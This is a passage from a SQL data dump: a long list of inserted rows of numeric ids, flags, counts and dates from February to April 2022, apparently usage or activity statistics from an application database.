02-24'),(327,9,0,0,35,1,3,'2022-02-25'),(328,9,0,0,85,1,2,'2022-02-25'),(329,1,0,0,0,2,5,'2022-02-25'),(330,0,0,1,543,4,1,'2022-02-25'),(331,0,0,1,596,2,1,'2022-02-25'),(335,0,1,0,0,20,2,'2022-02-25'),(337,0,0,1,532,2,1,'2022-02-25'),(340,0,0,1,1000,20,1,'2022-02-25'),(343,1,0,0,0,2,1,'2022-02-26'),(344,0,0,1,536,3,1,'2022-02-26'),(345,0,0,1,537,4,1,'2022-02-26'),(346,0,0,1,539,3,1,'2022-02-26'),(347,0,0,1,530,1,1,'2022-02-26'),(348,0,0,1,1000,20,1,'2022-02-27'),(349,9,0,0,35,1,1,'2022-03-01'),(350,0,1,0,0,22,1,'2022-03-01'),(351,0,0,1,1004,22,1,'2022-03-01'),(352,1,0,0,0,2,1,'2022-03-02'),(353,9,0,0,127,1,1,'2022-03-02'),(354,9,0,0,128,1,1,'2022-03-02'),(355,0,1,0,0,20,1,'2022-03-02'),(356,0,0,1,1001,20,1,'2022-03-03'),(357,0,0,1,1000,20,5,'2022-03-03'),(358,0,0,1,1006,22,1,'2022-03-03'),(359,0,0,1,1004,22,2,'2022-03-03'),(361,0,1,0,0,20,1,'2022-03-03'),(362,0,1,0,0,22,1,'2022-03-03'),(366,1,0,0,0,2,5,'2022-03-03'),(370,9,0,0,35,1,1,'2022-03-03'),(371,0,0,1,533,3,1,'2022-03-03'),(373,9,0,0,76,1,3,'2022-03-03'),(374,9,0,0,80,1,2,'2022-03-03'),(376,9,0,0,130,1,2,'2022-03-03'),(377,9,0,0,85,1,1,'2022-03-03'),(378,0,0,1,596,2,1,'2022-03-03'),(379,9,0,0,36,1,1,'2022-03-03'),(382,9,0,0,38,1,1,'2022-03-03'),(383,9,0,0,77,1,1,'2022-03-03'),(384,9,0,0,79,1,1,'2022-03-03'),(387,9,0,0,77,1,2,'2022-03-04'),(388,9,0,0,78,1,1,'2022-03-04'),(389,9,0,0,79,1,1,'2022-03-04'),(390,0,0,1,538,2,1,'2022-03-04'),(391,1,0,0,0,2,1,'2022-03-04'),(392,9,0,0,38,1,2,'2022-03-04'),(393,0,0,1,1107,21,1,'2022-03-04'),(394,9,0,0,37,1,2,'2022-03-04'),(395,9,0,0,35,1,1,'2022-03-04'),(396,0,0,1,1132,21,1,'2022-03-04'),(398,0,0,1,1119,21,1,'2022-03-04'),(399,1,0,0,0,21,1,'2022-03-04'),(402,0,0,1,1116,21,1,'2022-03-04'),(403,1,0,0,0,21,4,'2022-03-07'),(404,9,0,0,130,1,2,'2022-03-07'),(406,9,0,0,37,1,2,'2022-03-07'),(407,0,0,1,1194,25,1,'2022-03-07'),(408,9,0,0,85,1,2,'2022-03-07'),(409,0,0,1,1119,21,1,'2022-03-07'),(413,9,0,0,38,1,1,'2022-03-07'),(414,9,0,0,77,1,1,'2022-03-07'),(416,9,0,0,15,1,1,'2022-03-07'),(418,9,0,0,35,1,1,'2022-03-07'),(419,0,0,1,1087,21,1,'2022-03-07'),(420,1,0,0,0,21,3,'2022-03-08'),(423,9,0,0,35,1,1,'2022-03-08'),(424,9,0,0,36,1,1,'2022-03-08'),(425,9,0,0,38,1,1,'2022-03-08'),(426,0,0,1,1114,21,1,'2022-03-08'),(427,9,0,0,85,1,1,'2022-03-09'),(428,1,0,0,0,21,3,'2022-03-09'),(429,0,0,1,1114,21,1,'2022-03-09'),(431,0,0,1,1194,25,1,'2022-03-09'),(433,9,0,0,38,1,1,'2022-03-10'),(434,9,0,0,77,1,1,'2022-03-10'),(435,0,0,1,1194,25,1,'2022-03-10'),(436,0,0,1,1159,21,1,'2022-03-10'),(437,0,0,1,1165,21,1,'2022-03-10'),(438,0,0,1,1163,21,1,'2022-03-10'),(439,0,0,1,1069,21,1,'2022-03-10'),(440,1,0,0,0,21,3,'2022-03-11'),(442,9,0,0,35,1,1,'2022-03-11'),(443,9,0,0,85,1,2,'2022-03-11'),(444,9,0,0,36,1,1,'2022-03-11'),(445,0,0,1,1194,25,1,'2022-03-11'),(448,0,0,1,1165,21,1,'2022-03-11'),(449,0,0,1,1129,21,1,'2022-03-12'),(450,0,0,1,1128,21,1,'2022-03-12'),(451,0,0,1,1114,21,1,'2022-03-12'),(452,0,0,1,1137,21,1,'2022-03-12'),(453,1,0,0,0,25,2,'2022-03-13'),(454,9,0,0,85,1,1,'2022-03-13'),(455,9,0,0,128,1,1,'2022-03-13'),(456,9,0,0,35,1,2,'2022-03-13'),(457,9,0,0,36,1,2,'2022-03-13'),(458,9,0,0,127,1,1,'2022-03-13'),(459,9,0,0,79,1,1,'2022-03-13'),(460,9,0,0,78,1,1,'2022-03-13'),(461,9,0,0,80,1,1,'2022-03-13'),(462,9,0,0,129,1,1,'2022-03-13'),(463,9,0,0,38,1,2,'2022-03-13'),(464,9,0,0,77,1,2,'2022-03-13'),(465,9,0,0,76,1,1,'2022-03-13'),(466,9,0,0,37,1,2,'2022-03-13'),(467,0,0,1,1194,25,1,'2022-03-13'),(468,0,0,1,1264,21,1,'2022-03-13'),(469,9,0,0,130,1,1,'2022-03-13'),(471,0,0,1,1140,21,1,'2022-03-13'),(474,0,1,0,0,21,1,'2022-03-13'),(477,0,0,1,1169,21,1,'2022-03-13'),(479,0,0,1,1114,21,1,'2022-03-14'),(480,0,0,1,1111,21,1,'2022-03-14'),(481,1,0,0,0,25,2,'2022-03-14'),(482,0,0,1,1194,25,2,'2022-03-14'),(483,9,0,0,38,1,1,'2022-03-14'),(484,9,0,0,130,1,1,'2022-03-14'),(485,9,0,0,37,1,1,'2022-03-14'),(486,0,0,1,1091,21,1,'2022-03-14'),(487,0,0,1,1165,21,1,'2022-03-14'),(488,0,0,1,1169,21,1,'2022-03-14'),(489,0,0,1,1161,21,2,'2022-03-14'),(490,0,1,0,0,21,2,'2022-03-14'),(494,0,0,1,1137,21,1,'2022-03-14'),(495,0,0,1,1138,21,1,'2022-03-14'),(497,9,0,0,85,1,4,'2022-03-15'),(498,9,0,0,127,1,1,'2022-03-15'),(499,0,0,1,1097,21,2,'2022-03-15'),(500,0,0,1,1194,25,3,'2022-03-15'),(501,1,0,0,0,25,2,'2022-03-15'),(506,0,0,1,1263,21,1,'2022-03-15'),(510,0,0,1,1264,21,1,'2022-03-15'),(511,0,0,1,1169,21,1,'2022-03-15'),(512,0,0,1,1163,21,1,'2022-03-15'),(513,0,0,1,1159,21,1,'2022-03-15'),(514,1,0,0,0,21,1,'2022-03-16'),(515,0,0,1,1119,21,1,'2022-03-16'),(516,0,0,1,1263,21,1,'2022-03-16'),(517,0,0,1,1264,21,1,'2022-03-16'),(518,0,0,1,1287,21,3,'2022-03-16'),(519,0,0,1,1114,21,1,'2022-03-16'),(520,0,0,1,1116,21,1,'2022-03-16'),(521,0,0,1,1288,21,1,'2022-03-16'),(524,0,0,1,1287,21,3,'2022-03-17'),(525,0,0,1,1288,21,2,'2022-03-17'),(526,9,0,0,130,1,2,'2022-03-17'),(527,0,0,1,1116,21,2,'2022-03-17'),(528,0,0,1,1114,21,1,'2022-03-17'),(530,9,0,0,37,1,1,'2022-03-17'),(532,9,0,0,85,1,1,'2022-03-17'),(536,1,0,0,0,21,5,'2022-03-18'),(538,0,1,0,0,25,1,'2022-03-18'),(541,9,0,0,15,1,1,'2022-03-18'),(542,0,0,1,1069,21,1,'2022-03-18'),(543,9,0,0,35,1,1,'2022-03-18'),(544,0,0,1,1088,21,1,'2022-03-18'),(545,0,0,1,1082,21,1,'2022-03-18'),(546,0,0,1,1097,21,1,'2022-03-18'),(547,0,0,1,1263,21,2,'2022-03-18'),(548,0,0,1,1089,21,1,'2022-03-18'),(549,0,0,1,1083,21,1,'2022-03-18'),(550,0,0,1,1170,21,1,'2022-03-18'),(551,0,0,1,1159,21,1,'2022-03-18'),(552,9,0,0,130,1,3,'2022-03-18'),(553,0,0,1,1145,21,1,'2022-03-18'),(554,0,0,1,1091,21,2,'2022-03-18'),(555,0,0,1,1125,21,1,'2022-03-18'),(556,0,0,1,1126,21,1,'2022-03-18'),(557,0,0,1,1092,21,1,'2022-03-18'),(558,0,0,1,1129,21,1,'2022-03-18'),(559,0,0,1,1128,21,1,'2022-03-18'),(560,0,0,1,1169,21,1,'2022-03-18'),(561,0,0,1,1146,21,1,'2022-03-18'),(562,0,0,1,1132,21,1,'2022-03-18'),(563,0,0,1,1131,21,1,'2022-03-18'),(564,0,0,1,1093,21,1,'2022-03-18'),(565,0,0,1,1119,21,1,'2022-03-18'),(566,0,0,1,1100,21,1,'2022-03-18'),(567,0,0,1,1095,21,1,'2022-03-18'),(568,0,0,1,1140,21,1,'2022-03-18'),(569,0,0,1,1141,21,1,'2022-03-18'),(570,0,0,1,1264,21,1,'2022-03-18'),(571,0,0,1,1167,21,1,'2022-03-18'),(572,0,0,1,1122,21,1,'2022-03-18'),(573,0,0,1,1123,21,1,'2022-03-18'),(574,0,0,1,1135,21,1,'2022-03-18'),(575,0,0,1,1134,21,1,'2022-03-18'),(576,0,0,1,1120,21,1,'2022-03-18'),(577,0,0,1,1138,21,1,'2022-03-18'),(578,0,0,1,1137,21,1,'2022-03-18'),(579,0,0,1,1144,21,1,'2022-03-18'),(580,0,0,1,1143,21,1,'2022-03-18'),(581,0,0,1,1161,21,1,'2022-03-18'),(582,0,0,1,1086,21,1,'2022-03-18'),(583,0,0,1,1087,21,1,'2022-03-18'),(584,0,0,1,1084,21,1,'2022-03-18'),(585,0,0,1,1085,21,1,'2022-03-18'),(586,0,0,1,1114,21,1,'2022-03-18'),(587,0,0,1,1116,21,1,'2022-03-18'),(588,0,0,1,1111,21,1,'2022-03-18'),(589,0,0,1,1163,21,1,'2022-03-18'),(590,0,0,1,1102,21,1,'2022-03-18'),(591,0,0,1,1109,21,1,'2022-03-18'),(592,0,0,1,1117,21,1,'2022-03-18'),(593,0,0,1,1107,21,1,'2022-03-18'),(594,0,0,1,1165,21,1,'2022-03-18'),(595,9,0,0,36,1,1,'2022-03-18'),(596,9,0,0,37,1,1,'2022-03-18'),(599,9,0,0,85,1,1,'2022-03-18'),(603,1,0,0,0,21,5,'2022-03-19'),(604,9,0,0,130,1,1,'2022-03-19'),(605,9,0,0,35,1,3,'2022-03-19'),(606,9,0,0,36,1,1,'2022-03-19'),(607,9,0,0,37,1,1,'2022-03-19'),(608,9,0,0,38,1,1,'2022-03-19'),(609,9,0,0,77,1,1,'2022-03-19'),(610,0,0,1,1287,21,2,'2022-03-19'),(611,0,0,1,1288,21,2,'2022-03-19'),(612,0,0,1,1289,21,1,'2022-03-19'),(613,0,0,1,1263,21,2,'2022-03-19'),(614,0,0,1,1114,21,2,'2022-03-19'),(615,0,0,1,1116,21,2,'2022-03-19'),(616,0,0,1,1097,21,2,'2022-03-19'),(617,0,0,1,1264,21,1,'2022-03-19'),(618,0,0,1,1159,21,1,'2022-03-19'),(619,0,0,1,1161,21,1,'2022-03-19'),(620,0,0,1,1163,21,1,'2022-03-19'),(621,0,0,1,1165,21,1,'2022-03-19'),(622,0,0,1,1167,21,1,'2022-03-19'),(623,0,0,1,1169,21,1,'2022-03-19'),(624,0,0,1,1170,21,1,'2022-03-19'),(625,0,0,1,1109,21,1,'2022-03-19'),(626,0,0,1,1111,21,1,'2022-03-19'),(627,0,0,1,1117,21,1,'2022-03-19'),(628,0,0,1,1119,21,1,'2022-03-19'),(629,0,0,1,1120,21,1,'2022-03-19'),(630,0,0,1,1122,21,1,'2022-03-19'),(631,0,0,1,1123,21,1,'2022-03-19'),(632,0,0,1,1125,21,1,'2022-03-19'),(633,0,0,1,1126,21,1,'2022-03-19'),(634,0,0,1,1128,21,1,'2022-03-19'),(635,0,0,1,1129,21,1,'2022-03-19'),(636,0,0,1,1131,21,1,'2022-03-19'),(637,0,0,1,1132,21,1,'2022-03-19'),(638,0,0,1,1134,21,1,'2022-03-19'),(639,0,0,1,1135,21,1,'2022-03-19'),(640,0,0,1,1137,21,1,'2022-03-19'),(641,0,0,1,1138,21,1,'2022-03-19'),(642,9,0,0,85,1,1,'2022-03-19'),(643,0,0,1,1092,21,1,'2022-03-19'),(644,0,0,1,1107,21,1,'2022-03-19'),(645,9,0,0,127,1,1,'2022-03-19'),(646,9,0,0,128,1,1,'2022-03-19'),(647,9,0,0,129,1,1,'2022-03-19'),(648,0,0,1,1069,21,1,'2022-03-19'),(650,0,0,1,1082,21,1,'2022-03-19'),(651,0,0,1,1146,21,1,'2022-03-19'),(652,0,0,1,1145,21,1,'2022-03-19'),(653,0,0,1,1083,21,1,'2022-03-19'),(654,0,0,1,1084,21,1,'2022-03-19'),(655,0,0,1,1085,21,1,'2022-03-19'),(659,0,0,1,1143,21,1,'2022-03-19'),(660,0,0,1,1144,21,1,'2022-03-19'),(661,0,0,1,1088,21,1,'2022-03-19'),(662,0,0,1,1089,21,1,'2022-03-19'),(665,0,0,1,1095,21,1,'2022-03-19'),(666,0,0,1,1093,21,1,'2022-03-19'),(667,0,0,1,1100,21,1,'2022-03-19'),(674,9,0,0,130,1,2,'2022-03-20'),(676,9,0,0,37,1,1,'2022-03-21'),(677,9,0,0,36,1,1,'2022-03-21'),(678,0,1,0,0,21,1,'2022-03-21'),(679,0,0,1,1095,21,1,'2022-03-21'),(680,0,0,1,1069,21,1,'2022-03-21'),(681,9,0,0,35,1,1,'2022-03-22'),(682,9,0,0,36,1,1,'2022-03-22'),(683,9,0,0,37,1,1,'2022-03-22'),(684,9,0,0,38,1,1,'2022-03-22'),(685,9,0,0,77,1,1,'2022-03-22'),(686,9,0,0,130,1,1,'2022-03-22'),(687,9,0,0,127,1,1,'2022-03-22'),(688,1,0,0,0,21,2,'2022-03-22'),(689,0,0,1,1288,21,1,'2022-03-22'),(690,0,0,1,1114,21,1,'2022-03-22'),(692,9,0,0,37,1,1,'2022-03-23'),(693,9,0,0,77,1,1,'2022-03-23'),(694,0,0,1,1109,21,1,'2022-03-23'),(695,9,0,0,130,1,1,'2022-03-23'),(696,9,0,0,38,1,1,'2022-03-23'),(697,1,0,0,0,21,1,'2022-03-24'),(698,0,0,1,1144,21,1,'2022-03-25'),(699,0,0,1,1087,21,1,'2022-03-25'),(700,0,0,1,1165,21,1,'2022-03-25'),(701,1,0,0,0,21,33,'2022-03-25'),(702,0,0,1,1109,21,1,'2022-03-25'),(703,0,0,1,1102,21,1,'2022-03-25'),(704,0,0,1,1119,21,1,'2022-03-25'),(706,9,0,0,129,1,1,'2022-03-25'),(707,0,0,1,1129,21,1,'2022-03-25'),(709,9,0,0,128,1,1,'2022-03-25'),(710,9,0,0,35,1,6,'2022-03-25'),(711,0,0,1,1137,21,1,'2022-03-25'),(712,0,0,1,1084,21,1,'2022-03-25'),(713,0,0,1,1167,21,1,'2022-03-25'),(714,0,0,1,1145,21,1,'2022-03-25'),(715,0,0,1,1069,21,1,'2022-03-25'),(716,0,0,1,1134,21,1,'2022-03-25'),(717,9,0,0,37,1,1,'2022-03-25'),(718,0,0,1,1288,21,1,'2022-03-25'),(719,0,0,1,1125,21,1,'2022-03-25'),(720,0,0,1,1131,21,1,'2022-03-25'),(721,0,0,1,1161,21,1,'2022-03-25'),(723,0,0,1,1120,21,1,'2022-03-25'),(724,0,0,1,1135,21,1,'2022-03-25'),(725,9,0,0,77,1,1,'2022-03-25'),(727,0,0,1,1097,21,3,'2022-03-25'),(728,9,0,0,85,1,1,'2022-03-25'),(729,0,0,1,1123,21,1,'2022-03-25'),(732,0,0,1,1141,21,1,'2022-03-25'),(733,0,0,1,1088,21,1,'2022-03-25'),(735,0,0,1,1287,21,1,'2022-03-25'),(737,9,0,0,127,1,1,'2022-03-25'),(738,0,0,1,1122,21,1,'2022-03-25'),(740,0,0,1,1126,21,1,'2022-03-25'),(741,0,0,1,1169,21,1,'2022-03-25'),(743,0,0,1,1086,21,1,'2022-03-25'),(744,0,0,1,1146,21,1,'2022-03-25'),(745,0,0,1,1159,21,1,'2022-03-25'),(747,0,0,1,1093,21,1,'2022-03-25'),(748,9,0,0,38,1,1,'2022-03-25'),(749,0,0,1,1100,21,1,'2022-03-25'),(750,9,0,0,36,1,1,'2022-03-25'),(753,0,0,1,1091,21,1,'2022-03-25'),(756,0,0,1,1116,21,1,'2022-03-25'),(757,0,0,1,1132,21,1,'2022-03-25'),(759,0,0,1,1163,21,1,'2022-03-25'),(761,9,0,0,130,1,4,'2022-03-25'),(762,0,0,1,1264,21,1,'2022-03-25'),(766,0,0,1,1263,21,1,'2022-03-25'),(767,0,0,1,1114,21,1,'2022-03-25'),(768,0,0,1,1128,21,1,'2022-03-25'),(769,0,0,1,1089,21,1,'2022-03-25'),(771,0,0,1,1083,21,1,'2022-03-25'),(772,0,0,1,1289,21,1,'2022-03-25'),(775,0,0,1,1111,21,1,'2022-03-25'),(781,0,0,1,1138,21,1,'2022-03-25'),(784,0,0,1,1170,21,1,'2022-03-25'),(787,0,0,1,1085,21,1,'2022-03-25'),(790,0,0,1,1107,21,1,'2022-03-25'),(791,0,0,1,1092,21,1,'2022-03-25'),(793,0,0,1,1117,21,1,'2022-03-25'),(795,0,0,1,1082,21,1,'2022-03-25'),(798,0,0,1,1140,21,1,'2022-03-25'),(802,0,0,1,1095,21,1,'2022-03-25'),(803,0,0,1,1143,21,1,'2022-03-25'),(805,0,0,1,1287,21,1,'2022-03-26'),(806,0,0,1,1264,21,1,'2022-03-26'),(807,0,0,1,1263,21,1,'2022-03-26'),(808,9,0,0,35,1,1,'2022-03-28'),(809,0,0,1,1137,21,1,'2022-03-28'),(810,0,0,1,1287,21,2,'2022-03-29'),(811,0,0,1,1289,21,1,'2022-03-29'),(812,9,0,0,130,1,1,'2022-03-29'),(813,0,0,1,1169,21,1,'2022-03-29'),(815,0,0,1,1263,21,1,'2022-03-29'),(816,9,0,0,37,1,1,'2022-03-30'),(817,9,0,0,85,1,2,'2022-03-31'),(819,9,0,0,130,1,1,'2022-03-31'),(820,0,0,1,1120,21,1,'2022-03-31'),(821,0,0,1,1159,21,1,'2022-03-31'),(822,0,0,1,1135,21,1,'2022-03-31'),(823,0,0,1,1165,21,1,'2022-03-31'),(824,0,0,1,1093,21,1,'2022-03-31'),(825,0,0,1,1163,21,1,'2022-03-31'),(826,0,0,1,1069,21,1,'2022-03-31'),(827,9,0,0,35,1,1,'2022-04-01'),(828,9,0,0,130,1,2,'2022-04-02'),(829,9,0,0,77,1,2,'2022-04-02'),(830,0,1,0,0,21,2,'2022-04-02'),(831,9,0,0,35,1,2,'2022-04-02'),(832,9,0,0,36,1,2,'2022-04-02'),(834,0,0,1,1287,21,1,'2022-04-02'),(839,0,0,1,1097,21,1,'2022-04-02'),(840,9,0,0,36,1,1,'2022-04-06'),(841,9,0,0,77,1,1,'2022-04-06'),(842,9,0,0,35,1,1,'2022-04-06'),(843,0,0,1,1145,21,1,'2022-04-06'),(844,1,0,0,0,21,2,'2022-04-06'),(846,1,0,0,0,21,20,'2022-04-10'),(849,0,1,0,0,25,1,'2022-04-10'),(852,9,0,0,15,1,1,'2022-04-10'),(853,9,0,0,85,1,1,'2022-04-10'),(854,9,0,0,128,1,1,'2022-04-10'),(856,9,0,0,35,1,8,'2022-04-10'),(857,9,0,0,36,1,2,'2022-04-10'),(858,9,0,0,127,1,1,'2022-04-10'),(864,0,0,1,1069,21,1,'2022-04-10'),(866,0,0,1,1088,21,1,'2022-04-10'),(867,0,0,1,1082,21,1,'2022-04-10'),(871,9,0,0,79,1,1,'2022-04-10'),(872,9,0,0,78,1,1,'2022-04-10'),(874,9,0,0,80,1,1,'2022-04-10'),(875,0,0,1,1097,21,1,'2022-04-10'),(876,0,0,1,1263,21,3,'2022-04-10'),(877,0,0,1,1089,21,1,'2022-04-10'),(878,0,0,1,1083,21,1,'2022-04-10'),(879,0,0,1,1170,21,1,'2022-04-10'),(880,9,0,0,129,1,1,'2022-04-10'),(881,0,0,1,1159,21,1,'2022-04-10'),(882,9,0,0,38,1,2,'2022-04-10'),(883,9,0,0,77,1,2,'2022-04-10'),(884,9,0,0,76,1,1,'2022-04-10'),(885,9,0,0,130,1,5,'2022-04-10'),(886,9,0,0,37,1,2,'2022-04-10'),(887,0,0,1,1145,21,1,'2022-04-10'),(888,0,0,1,1091,21,1,'2022-04-10'),(889,0,0,1,1125,21,1,'2022-04-10'),(890,0,0,1,1126,21,1,'2022-04-10'),(893,0,0,1,1092,21,1,'2022-04-10'),(894,0,0,1,1129,21,1,'2022-04-10'),(895,0,0,1,1128,21,1,'2022-04-10'),(896,0,0,1,1169,21,1,'2022-04-10'),(897,0,0,1,1146,21,1,'2022-04-10'),(898,0,0,1,1132,21,1,'2022-04-10'),(899,0,0,1,1131,21,1,'2022-04-10'),(900,0,0,1,1093,21,1,'2022-04-10'),(901,0,0,1,1119,21,1,'2022-04-10'),(902,0,0,1,1100,21,1,'2022-04-10'),(903,0,0,1,1095,21,1,'2022-04-10'),(904,0,0,1,1140,21,1,'2022-04-10'),(905,0,0,1,1141,21,1,'2022-04-10'),(906,0,0,1,1264,21,1,'2022-04-10'),(907,0,0,1,1167,21,1,'2022-04-10'),(908,0,0,1,1122,21,1,'2022-04-10'),(909,0,0,1,1123,21,2,'2022-04-10'),(912,0,0,1,1135,21,1,'2022-04-10'),(913,0,0,1,1134,21,1,'2022-04-10'),(914,0,0,1,1120,21,1,'2022-04-10'),(915,0,0,1,1138,21,1,'2022-04-10'),(916,0,0,1,1137,21,1,'2022-04-10'),(917,0,0,1,1144,21,1,'2022-04-10'),(918,0,0,1,1143,21,1,'2022-04-10'),(924,0,0,1,1161,21,1,'2022-04-10'),(930,0,0,1,1086,21,1,'2022-04-10'),(931,0,0,1,1087,21,1,'2022-04-10'),(932,0,0,1,1084,21,1,'2022-04-10'),(933,0,0,1,1085,21,1,'2022-04-10'),(934,0,0,1,1114,21,1,'2022-04-10'),(935,0,0,1,1116,21,1,'2022-04-10'),(936,0,0,1,1111,21,1,'2022-04-10'),(937,0,0,1,1289,21,2,'2022-04-10'),(938,0,0,1,1287,21,2,'2022-04-10'),(939,0,0,1,1288,21,2,'2022-04-10'),(940,0,0,1,1163,21,1,'2022-04-10'),(941,0,0,1,1102,21,1,'2022-04-10'),(942,0,0,1,1109,21,1,'2022-04-10'),(943,0,0,1,1117,21,1,'2022-04-10'),(944,0,0,1,1107,21,1,'2022-04-10'),(945,0,0,1,1165,21,1,'2022-04-10'),(957,0,0,1,1114,21,1,'2022-04-11'),(958,0,1,0,0,21,6,'2022-04-11'),(963,9,0,0,130,1,1,'2022-04-11'),(964,0,0,1,1287,21,1,'2022-04-11'),(965,0,0,1,1085,21,1,'2022-04-11'),(966,9,0,0,35,1,1,'2022-04-11'),(967,0,0,1,1116,21,1,'2022-04-11'),(968,9,0,0,37,1,1,'2022-04-11'),(969,9,0,0,38,1,1,'2022-04-11'),(971,0,0,1,1084,21,1,'2022-04-11'),(972,9,0,0,77,1,1,'2022-04-11'),(973,1,0,0,0,21,2,'2022-04-12'),(974,0,0,1,1069,21,1,'2022-04-12'),(976,9,0,0,130,1,1,'2022-04-12'),(977,9,0,0,127,1,1,'2022-04-14'),(978,9,0,0,128,1,1,'2022-04-14'),(979,9,0,0,129,1,1,'2022-04-14'),(980,0,0,1,1097,21,1,'2022-04-17'),(981,0,0,1,1287,21,1,'2022-04-17'),(982,0,0,1,1167,21,1,'2022-04-17'),(983,0,0,1,1165,21,1,'2022-04-17'),(984,9,0,0,37,1,1,'2022-04-17'),(985,9,0,0,35,1,1,'2022-04-17'),(986,9,0,0,77,1,1,'2022-04-17'),(987,0,0,1,1161,21,1,'2022-04-17'),(988,0,0,1,1159,21,1,'2022-04-17'),(989,0,0,1,1288,21,1,'2022-04-17'),(990,0,0,1,1264,21,1,'2022-04-17'),(991,0,0,1,1163,21,1,'2022-04-17'),(992,0,0,1,1263,21,1,'2022-04-17'),(993,0,0,1,1114,21,1,'2022-04-17'),(994,0,0,1,1116,21,1,'2022-04-17'),(995,0,0,1,1114,21,1,'2022-04-20'),(996,0,0,1,1116,21,1,'2022-04-20'),(997,0,0,1,1097,21,1,'2022-04-20'),(998,0,0,1,1263,21,1,'2022-04-20'),(999,0,0,1,1287,21,1,'2022-04-20'),(1000,0,0,1,1288,21,1,'2022-04-20'),(1001,1,0,0,0,21,19,'2022-04-21'),(1004,0,1,0,0,25,1,'2022-04-21'),(1007,9,0,0,15,1,1,'2022-04-21'),(1008,9,0,0,85,1,1,'2022-04-21'),(1009,9,0,0,128,1,2,'2022-04-21'),(1010,9,0,0,35,1,7,'2022-04-21'),(1011,9,0,0,36,1,1,'2022-04-21'),(1012,9,0,0,127,1,2,'2022-04-21'),(1018,0,0,1,1069,21,1,'2022-04-21'),(1020,0,0,1,1088,21,2,'2022-04-21'),(1021,0,0,1,1082,21,1,'2022-04-21'),(1025,9,0,0,79,1,1,'2022-04-21'),(1026,9,0,0,78,1,1,'2022-04-21'),(1028,9,0,0,80,1,1,'2022-04-21'),(1029,0,0,1,1097,21,1,'2022-04-21'),(1030,0,0,1,1263,21,3,'2022-04-21'),(1031,0,0,1,1089,21,1,'2022-04-21'),(1032,0,0,1,1083,21,1,'2022-04-21'),(1033,0,0,1,1170,21,1,'2022-04-21'),(1034,9,0,0,129,1,2,'2022-04-21'),(1035,0,0,1,1159,21,1,'2022-04-21'),(1036,9,0,0,38,1,1,'2022-04-21'),(1037,9,0,0,77,1,1,'2022-04-21'),(1038,9,0,0,76,1,1,'2022-04-21'),(1039,9,0,0,130,1,4,'2022-04-21'),(1040,9,0,0,37,1,1,'2022-04-21'),(1041,0,0,1,1145,21,1,'2022-04-21'),(1042,0,0,1,1091,21,1,'2022-04-21'),(1043,0,0,1,1125,21,1,'2022-04-21'),(1044,0,0,1,1126,21,2,'2022-04-21'),(1047,0,0,1,1092,21,1,'2022-04-21'),(1048,0,0,1,1129,21,1,'2022-04-21'),(1049,0,0,1,1128,21,2,'2022-04-21'),(1050,0,0,1,1169,21,1,'2022-04-21'),(1051,0,0,1,1146,21,1,'2022-04-21'),(1052,0,0,1,1132,21,2,'2022-04-21'),(1053,0,0,1,1131,21,2,'2022-04-21'),(1054,0,0,1,1093,21,1,'2022-04-21'),(1055,0,0,1,1119,21,1,'2022-04-21'),(1056,0,0,1,1100,21,1,'2022-04-21'),(1057,0,0,1,1095,21,1,'2022-04-21'),(1058,0,0,1,1140,21,2,'2022-04-21'),(1059,0,0,1,1141,21,1,'2022-04-21'),(1060,0,0,1,1264,21,2,'2022-04-21'),(1061,0,0,1,1167,21,1,'2022-04-21'),(1062,0,0,1,1122,21,1,'2022-04-21'),(1063,0,0,1,1123,21,1,'2022-04-21'),(1066,0,0,1,1135,21,1,'2022-04-21'),(1067,0,0,1,1134,21,1,'2022-04-21'),(1068,0,0,1,1120,21,1,'2022-04-21'),(1069,0,0,1,1138,21,1,'2022-04-21'),(1070,0,0,1,1137,21,2,'2022-04-21'),(1071,0,0,1,1144,21,1,'2022-04-21'),(1072,0,0,1,1143,21,1,'2022-04-21'),(1078,0,0,1,1161,21,1,'2022-04-21'),(1084,0,0,1,1086,21,2,'2022-04-21'),(1085,0,0,1,1087,21,2,'2022-04-21'),(1086,0,0,1,1084,21,2,'2022-04-21'),(1087,0,0,1,1085,21,1,'2022-04-21'),(1088,0,0,1,1114,21,1,'2022-04-21'),(1089,0,0,1,1116,21,1,'2022-04-21'),(1090,0,0,1,1111,21,1,'2022-04-21'),(1091,0,0,1,1289,21,1,'2022-04-21'),(1092,0,0,1,1287,21,2,'2022-04-21'),(1093,0,0,1,1288,21,1,'2022-04-21'),(1094,0,0,1,1163,21,1,'2022-04-21'),(1095,0,0,1,1102,21,1,'2022-04-21'),(1096,0,0,1,1109,21,1,'2022-04-21'),(1097,0,0,1,1117,21,1,'2022-04-21'),(1098,0,0,1,1107,21,1,'2022-04-21'),(1099,0,0,1,1165,21,1,'2022-04-21'),(1116,0,0,1,1287,21,1,'2022-04-26'),(1117,0,0,1,1126,21,1,'2022-04-26'),(1118,0,0,1,1165,21,1,'2022-04-26'),(1119,0,0,1,1109,21,1,'2022-04-26'),(1120,0,0,1,1289,21,1,'2022-04-26'),(1121,0,0,1,1167,21,1,'2022-04-26'),(1122,9,0,0,129,1,1,'2022-04-26'),(1123,0,0,1,1264,21,1,'2022-04-26'),(1124,0,0,1,1161,21,1,'2022-04-26'),(1125,0,0,1,1138,21,1,'2022-04-26'),(1126,9,0,0,35,1,1,'2022-04-26'),(1127,9,0,0,77,1,1,'2022-04-26'),(1128,0,0,1,1169,21,1,'2022-04-26'),(1129,0,0,1,1263,21,1,'2022-04-26'),(1130,0,0,1,1120,21,1,'2022-04-26'),(1131,0,0,1,1125,21,1,'2022-04-26'),(1132,0,0,1,1128,21,1,'2022-04-26'),(1133,0,0,1,1087,21,1,'2022-04-27'),(1134,0,0,1,1131,21,1,'2022-04-27'),(1135,0,0,1,1129,21,1,'2022-04-27'),(1136,1,0,0,0,21,5,'2022-04-27'),(1137,9,0,0,127,1,1,'2022-04-27'),(1138,9,0,0,128,1,1,'2022-04-27'),(1139,0,0,1,1107,21,1,'2022-04-27'),(1140,0,0,1,1144,21,1,'2022-04-27'),(1141,0,0,1,1097,21,1,'2022-04-27'),(1142,0,0,1,1132,21,1,'2022-04-27'),(1143,0,0,1,1288,21,1,'2022-04-27'),(1144,0,0,1,1140,21,1,'2022-04-27'),(1145,9,0,0,35,1,3,'2022-04-27'),(1146,0,0,1,1141,21,1,'2022-04-27'),(1147,0,0,1,1091,21,1,'2022-04-27'),(1148,9,0,0,36,1,1,'2022-04-27'),(1149,9,0,0,130,1,1,'2022-04-27'),(1151,0,0,1,1088,21,1,'2022-04-27'),(1152,0,0,1,1143,21,1,'2022-04-27'),(1154,9,0,0,38,1,1,'2022-04-27'),(1156,0,0,1,1093,21,1,'2022